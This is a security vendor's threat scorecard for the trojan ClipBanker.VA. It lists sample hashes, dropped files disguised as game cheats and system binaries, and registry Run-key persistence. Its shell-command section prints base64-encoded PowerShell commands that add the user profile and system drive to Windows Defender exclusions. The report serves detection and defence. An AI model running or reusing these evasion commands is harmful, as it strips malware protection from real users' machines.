Trojan.ClipBanker.VA
Threat Scorecard
EnigmaSoft Threat Scorecard
EnigmaSoft Threat Scorecards are assessment reports for different malware threats which have been collected and analyzed by our research team. EnigmaSoft Threat Scorecards evaluate and rank threats using several metrics including real-world and potential risk factors, trends, frequency, prevalence, and persistence. EnigmaSoft Threat Scorecards are updated regularly based on our research data and metrics and are useful for a wide range of computer users, from end users seeking solutions to remove malware from their systems to security experts analyzing threats.
EnigmaSoft Threat Scorecards display a variety of useful information, including:
Popularity Rank: The ranking of a particular threat in EnigmaSoft’s Threat Database.
Severity Level: The determined severity level of an object, represented numerically, based on our risk modeling process and research, as explained in our Threat Assessment Criteria.
Infected Computers: The number of confirmed and suspected cases of a particular threat detected on infected computers as reported by SpyHunter.
See also Threat Assessment Criteria.
| Popularity Rank: | 6,177 |
| Threat Level: | 80 % (High) |
| Infected Computers: | 1,460 |
| First Seen: | September 13, 2021 |
| Last Seen: | April 17, 2026 |
| OS(es) Affected: | Windows |
Analysis Report
General information
| Family Name: | Trojan.ClipBanker.VA |
|---|---|
| Signature status: | No Signature |
Known Samples
This section lists other file samples believed to be associated with this family.

| MD5 | SHA1 | SHA256 | File Size |
|---|---|---|---|
| d074b8105f3cfb73a4cba5c6f81b721f | bee8f717c037f0e10636a0d2d94b3709c296a33f | CBF012A39CCE7B310060BDF9E83EADD70D68B8F5C6372ADC780594AAD28C7E9C | 597.50 KB, 597504 bytes |
| db554d8112be97e51d380aa1d2e9caff | 81cf54be83b2ee85c0f66be95c3dd4bd67eed00a | A4709844B0F3C5AB7A1DF0CEAACAE58368950D89188E9F1BA8F62E8FF5627E93 | 4.95 MB, 4948480 bytes |
| d319034bd1e93147a1a7fee39bd8efef | d5db70fa0d003e302e697e22569820e98159f2cf | 05EDACB20CFC83D970514B1737FF376BF6D22CA2137B79A83F8862371142AABA | 3.86 MB, 3856384 bytes |
| 3b5865192ea41263be0a78b4d8a7c795 | 946d09aeb6ad5c0fd13d4bbd24ed08623f84e413 | 1F5B18D6733E467C7D89B90CD82F4EC287423AB049617B3E1D0DDA246731CE81 | 4.61 KB, 4608 bytes |
| 5c0250fe8ef9d9c7629613b3291bc2f7 | 114d72ed97bde1880c3108fa8c9721c262bcfb4d | BB6C959DD42A95FD673B89017C29B0F8973257136AC7E6B67130ECD1A322BA39 | 5.11 MB, 5112320 bytes |
| 5c50e98bd9069ebec62430fd1b950224 | d5b557f71ded2dad2b8554bb0fbfc07c686f722c | E42D0139C1AA4E523BF19A41544B79983CA00AADC198850D000D604091EF1262 | 6.91 MB, 6913024 bytes |
| 067966556e298017a6b9d81f5557fcc7 | 4c2f9510073e48f7a6099c585f64a74a7193c474 | 4B1A7381C6C41622D06A8CD7595D1EBB64F6DAB0A92F7FE3EB5C05A02AEFF379 | 5.63 KB, 5632 bytes |
| 7c92dc274a841225f5365fe2b652d1bd | c883512403289967dc36a3b42e542bb143964edf | 866AAB0D5686C8472B7F66EAE04C9ADC65E0905AC2AD753846DC1F51CB8A3D1D | 4.97 MB, 4968960 bytes |
| 3952bc52ce739ce187376c7c3676890d | f298e3fb9785b8183656c6eb234b79baba4c932e | 314AF32AC8F51A80EC296C6385B98B271F59DC6F62B9C26BB2E6E3114A7E27C3 | 2.88 MB, 2882048 bytes |
| 11ebdd9aca574d84df203b50d6043016 | 4d254f14113d88e10eb561761f3a174ce9d45188 | 59A9D8229077F15022FDE78FD4F85DEB678C2988E753DC2D94D0A7C2955C30D7 | 3.98 MB, 3977728 bytes |
| 865f03a25ebd95cd7265925830637d1e | e306986287b6c86ee57664c316fc9e4fc126724f | 264B727825F695359C76F9557EE76583FFB2480436ECF2ADB2FA3A579103268E | 5.12 KB, 5120 bytes |
| 35c421bc5abe4c91fb1279199e01ee39 | 06c18196aa5893001230f899c373d65df6bd5444 | 6DCA97E2018AC963F5D52FC3B1DF44F6B7CF81EDF0A97ABB1A96A61A3A00919E | 5.12 KB, 5120 bytes |
| f98e07af6457d92759751cdd95696e6a | 394fec1c983a5173289722eb14358a1eeab16255 | E319B8275B4597CC816AF066F0F80873AC9F0D95FBCED487093EECBEC9080682 | 1.65 MB, 1647162 bytes |
| 5933a3a60f512aa73aa722a2948a4e8a | aadb9bf5df1fd609c30394f469b829d2ad0dc937 | 49D08802E297EBA82CE35AB694B23F6EDDC346EADA6164A4357C7849155B689B | 4.61 KB, 4608 bytes |
| 61397890ebceb654c7825ae932317a58 | a6223691375d4683bac249b8e6ad6c6a4ec198aa | 82A6F2F42016F287A82128267353B3FE6F45B7CD35D2EBCAFC022037732BDE5E | 274.43 KB, 274432 bytes |
| 20eab47b2ffb0d746224d9d3ad8befc6 | 678c8f91a930cf298a0224c6078c044300e8b04b | C6201A44444FF8FA3BDA29301B5E8951FB7648A64B83727A177FB7505062622B | 400.90 KB, 400896 bytes |
| 3b75cb83a454229c6f184f4b917c5601 | b4df6adf5d379ae1325c3b53a102213ba002dfa0 | F49921EABE793A140E2CE96356F3963738BD93E1E68392066F41471E080F86BD | 3.25 MB, 3245056 bytes |
| 734696e908927926f0649a09ea312316 | 2c09d5bfe2fe3f427f79b1ed518a9d2d3ff888cc | 7F4AF6A07A372348FD335C6CEBDCDABCF93B8BE95F4A148BFFA5792E532F08E4 | 2.12 MB, 2124288 bytes |
| 6faa93d2dc8b30d5d79441748722ae23 | fec1abec1aa58c7c5d134947207d8f30888e5d3f | 3084109427E6F69462A643AFDFD441D997DAB7252154F6BD4393B5DC558DA3C6 | 4.08 MB, 4077568 bytes |
| b819b1472bc54945ce528dfbec15ef8c | e344a2ff2c2872b58b05cdcb2e3a0f5e3dcb1ff7 | BA330C5A968A5C9D3059BD8F48327FD0E011AA15EA0BA5F7891C248D9B9FAF53 | 670.72 KB, 670720 bytes |
| 5257cee793739b7aa2bebe35ef572a5c | 9c9aaffd64aba6fc084cdb989bf87f71a3d32e37 | 1C51CE0C3EE4CFED08079E40F744EE1F961034993C2DCE5F446838C605D3CCA2 | 1.18 MB, 1182720 bytes |
| f847cd9e0e3018581031fc5caf6f066b | a9923f80e6189e29a6c93fe1967443e8457128f9 | 7C43382483C028D6E944A7061F2615E5650357DD87956C2265657CC5DEB790A4 | 1.40 MB, 1402880 bytes |
| 2bcf3f62313588212933d1ad051fd282 | 0f1d6b9cb2e61c4cdf2c10ca23941c407b0b308c | CCFBED578FC36050338134AF7A23C452DFF87C23FD3D6C64B43B39EF44265DC6 | 3.03 MB, 3031040 bytes |
| 40a31d73942ec084e3201c8b9be17069 | 527c6f8b53de92f3af393f58021aabb78714ae89 | 6FFD1B8B7C4912B4FB0BDB1437371A1E761854092FB0C3E4934D32E9A30D9F38 | 75.78 KB, 75776 bytes |
Windows Portable Executable Attributes
- File doesn't have "Rich" header
- File doesn't have debug information
- File doesn't have exports table
- File doesn't have relocations information
- File doesn't have resources
- File doesn't have security information
- File has been packed
- File has TLS information
- File is 32-bit executable
- File is either console or GUI application
- File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
- File is Native application (NOT .NET application)
- File is not packed
- IMAGE_FILE_DLL is not set inside PE header (Executable)
- IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)
File Icons
This section displays icon resources found within family samples. Malware often replicates icons commonly associated with legitimate software to mislead users into believing the malware is safe.

Windows PE Version Information
This section displays values and attributes that have been set in the Windows file version information data structure for samples within this family. To mislead users, malware actors often add fake version information mimicking legitimate software.

| Name | Value |
|---|---|
| Company Name | XenoUI |
| File Description | XenoUI |
| File Title | XenoUI.dll |
| File Version | |
| Internal Name | TJprojMain |
| Legal Copyright | Rizve |
| Original Filename | TJprojMain.exe |
| Product Name | |
| Product Version | |
File Traits
- fptable
- HighEntropy
- No Version Info
- packed
- x86
Block Information
During analysis, EnigmaSoft breaks file samples into logical blocks for classification and comparison with other samples. Blocks can be used to generate malware detection rules and to group file samples into families based on shared source code, functionality and other distinguishing attributes and characteristics. This section lists a summary of this block data, as well as its classification by EnigmaSoft. A visual representation of the block data is also displayed, where available.

| Total Blocks: | 8 |
|---|---|
| Potentially Malicious Blocks: | 7 |
| Whitelisted Blocks: | 1 |
| Unknown Blocks: | 0 |

Visual Map (image not reproduced here; legend: ? = Unknown Block, x = Potentially Malicious Block)
Similar Families
This section lists other families that share similarities with this family, based on EnigmaSoft’s analysis. Many malware families are created from the same malware toolkits and use the same packing and encryption techniques but uniquely extend functionality. Similar families may also share source code, attributes, icons, subcomponents, compromised and/or invalid digital signatures, and network characteristics. Researchers leverage these similarities to rapidly and effectively triage file samples and extend malware detection rules.

- ClipBanker.VA
- Dapato.AL
Files Modified
This section lists files that were created, modified, moved and/or deleted by samples in this family. File system activity can provide valuable insight into how malware functions on the operating system.

| File | Attributes |
|---|---|
| \device\namedpipe\dav rpc service | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| \device\namedpipe\pshost.134063647683626032.4408.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134063647684630716.5644.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134066643681019175.2956.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134071580881195168.3876.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134087998441205982.7828.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134098748388717683.8660.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134104082697386674.4024.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134122556483075982.508.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134145088444479320.6440.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134211145868314600.3116.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\wkssvc | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\5e4d.tmp\5e6d.tmp\5e8e.bat | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_1xt0dixy.za5.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_2gdnme25.egk.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_2gy13yri.kcj.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_33j5bdjo.gsu.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_3figtrjf.p55.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_5nfly1x0.hog.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_5omayrkh.4o0.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_bkezoo24.5y2.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_bowk4wif.uah.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_eos0gqc3.slc.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_essqzfri.5l1.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_i1g1rogr.1qs.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_iasdahex.2yt.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_ngnvm5z4.03g.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_p2s55xk5.ayc.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_pn3vo2mc.xbr.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_qjffutxs.1na.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_s0trlcam.fda.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_seydvbqx.aqa.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_slktxzoa.vwo.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_vcnfnh5i.iko.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_vxv1egut.0eo.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\compiler.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\file.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\immortal free1.2.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\immortal.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\imx free.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\licensevalidator\license.txt | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\licensevalidator\main.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\miner.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\painel pago.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\rayd cheat.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\refrech3.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\securyt.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\vison free.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\xenouiconfig.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\roaming\monotone.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\roaming\registry.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\roaming\smartscreen.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\roaming\subdir.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\roaming\svchost.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\roaming\system.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\roaming\trashcrack.exe | Generic Write,Read Attributes |
| c:\users\user\downloads\xeno.exe | Generic Write,Read Attributes |
| c:\windows\vison free.exe | Generic Write,Read Attributes |
Registry Modifications
This section lists registry keys and values that were created, modified and/or deleted by samples in this family. Windows Registry activity can provide valuable insight into malware functionality. Additionally, malware often creates registry values to allow itself to automatically start and indefinitely persist after an initial infection has compromised the system.

| Key::Value | Data | API Name |
|---|---|---|
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass | | RegNtPreCreateKey |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname | | RegNtPreCreateKey |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet | | RegNtPreCreateKey |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect | | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 塟憀䨭ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | ꗓ憎䨭ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 앋磫兤ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 뮚縧冂ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | ✢繋冂ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 缊冂ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKLM\software\microsoft\tracing\rasapi32::enablefiletracing | | RegNtPreCreateKey |
| HKLM\software\microsoft\tracing\rasapi32::enableautofiletracing | | RegNtPreCreateKey |
| HKLM\software\microsoft\tracing\rasapi32::enableconsoletracing | | RegNtPreCreateKey |
| HKLM\software\microsoft\tracing\rasapi32::filetracingmask | | RegNtPreCreateKey |
| HKLM\software\microsoft\tracing\rasapi32::consoletracingmask | | RegNtPreCreateKey |
| HKLM\software\microsoft\tracing\rasapi32::maxfilesize | | RegNtPreCreateKey |
| HKLM\software\microsoft\tracing\rasapi32::filedirectory | %windir%\tracing | RegNtPreCreateKey |
| HKLM\software\microsoft\tracing\rasmancs::enablefiletracing | | RegNtPreCreateKey |
| HKLM\software\microsoft\tracing\rasmancs::enableautofiletracing | | RegNtPreCreateKey |
| HKLM\software\microsoft\tracing\rasmancs::enableconsoletracing | | RegNtPreCreateKey |
| HKLM\software\microsoft\tracing\rasmancs::filetracingmask | | RegNtPreCreateKey |
| HKLM\software\microsoft\tracing\rasmancs::consoletracingmask | | RegNtPreCreateKey |
| HKLM\software\microsoft\tracing\rasmancs::maxfilesize | | RegNtPreCreateKey |
| HKLM\software\microsoft\tracing\rasmancs::filedirectory | %windir%\tracing | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 㣗䳦ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 蕺恒ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 뮖ﰺ恒ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | 㵛 ȁ 獖} | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 㯟ﳾ恒ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 꾺ﴲ恒ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 㠕ﵛ恒ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | ␂標ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | 鰀 ȁ 獖} | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 滳ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | ➑翁ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 渟䤣鐿ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 붶穪큓ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | | RegNtPreCreateKey |
| HKCU\software\microsoft\windows\currentversion\run::registry | C:\Users\Xcqunmbw\AppData\Roaming\Registry.exe | RegNtPreCreateKey |
| HKCU\software\microsoft\windows\currentversion\run::smartscreen | C:\Users\Xcqunmbw\AppData\Roaming\smartscreen.exe | RegNtPreCreateKey |
Windows API Usage
This section lists Windows API calls that are used by the samples in this family. Windows API usage analysis is a valuable tool that can help identify malicious activity, such as keylogging, security privilege escalation, data encryption, data exfiltration, interference with antivirus software, and network request manipulation.

| Category | API |
|---|---|
| Process Shell Execute | |
| Syscall Use | |
| Anti Debug | |
| User Data Access | |
| Process Manipulation Evasion | |
| Encryption Used | |
| Other Suspicious | |
| Network Winsock2 | |
| Network Winsock | |
| Network Icmp | |
| Network Winhttp | |
| Network Info Queried | |

31 additional items are not displayed above.
Shell Command Execution
This section lists Windows shell commands that are run by the samples in this family. Windows Shell commands are often leveraged by malware for nefarious purposes and can be used to elevate security privileges, download and launch other malware, exploit vulnerabilities, collect and exfiltrate data, and hide malicious activity.

- open powershell -EncodedCommand "PAAjAHgAZwBuACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGMAcgBhACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATQBpAHMAcwBpAG4AZwAgAEQATABMACAAKABkAGIAZABnAHkAYQB0AC4AZABsAGwAKQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAeABhAG0AIwA+AA=="
- open powershell -EncodedCommand "PAAjAGoAegBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAbQBxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAeQBzACMAPgA="
- open C:\Users\Pvgviwwm\AppData\Local\Temp\Compiler.exe
- C:\Users\Wcypxflh\AppData\Local\Temp\File.exe (NULL)
- open powershell -EncodedCommand "PAAjAG0AcAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAYwBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAZgBmACMAPgA="
- open C:\Users\Xrgzroxm\AppData\Roaming\Monotone.exe
- open C:\Users\Xrgzroxm\AppData\Local\Temp\Compiler.exe
- "C:\WINDOWS\system32\cmd" /c "\5E4D.tmp\5E6D.tmp\5E8E.bat C:\Users\Xrgzroxm\AppData\Roaming\Monotone.exe"
- C:\WINDOWS\system32\mode.com mode 80,20
- WriteConsole: Access is denied
- WriteConsole: e295a0e29590e295ace29590e295a320
- WriteConsole: Your unique sess
- WriteConsole:
- WriteConsole: 4502-29797-8010
- C:\WINDOWS\system32\PING.EXE ping localhost
- WriteConsole: 'colorecho-vc10-
- WriteConsole: Coded by
- WriteConsole:
- WriteConsole: If this doesn
- WriteConsole: Contact
- WriteConsole: This i
- WriteConsole: 'Button' is not
- WriteConsole: 'GetInput' is no
- open C:\Users\Mryehchx\AppData\Local\Temp\PAINEL PAGO.exe
- open powershell -EncodedCommand "PAAjAGYAaABzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAYgB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYQBuACMAPgA="
- open C:\Users\Cmpflbeo\AppData\Local\Temp\miner.exe
- open C:\Users\Cmpflbeo\AppData\Roaming\TrashCrack.exe
- open C:\Users\Qjkbpfsl\AppData\Local\Temp\IMMORTAL FREE1.2.exe
- open Xeno.exe
- open C:\Users\Wzrhnfss\AppData\Local\Temp\xenoUIConfig.exe
- C:\Users\Wzrhnfss\AppData\Local\Temp\LicenseValidator\main.exe (NULL)
- open powershell -EncodedCommand "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"
- open C:\Users\Rzihfwse\AppData\Local\Temp\refrech3.exe
- open C:\Users\Onrykltk\AppData\Local\Temp\Vison FREE.exe
- open C:\Users\Jjgqlhjt\AppData\Local\Temp\Securyt.exe
- open C:\Users\Nflhzcog\AppData\Local\Temp\Rayd Cheat.exe
- open powershell -EncodedCommand "PAAjAHYAeABkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcwB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAZQB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbAB3ACMAPgA="
- open C:\Users\Lgcrrysk\AppData\Roaming\svchost.exe
- open C:\Users\Lgcrrysk\AppData\Roaming\subdir.exe
- open C:\WINDOWS\VISON FREE.exe
- open C:\Users\Tjgnojwc\AppData\Local\Temp\IMX FREE.exe
- open C:\Users\Kwrxiugf\AppData\Local\Temp\IMMORTAL.exe
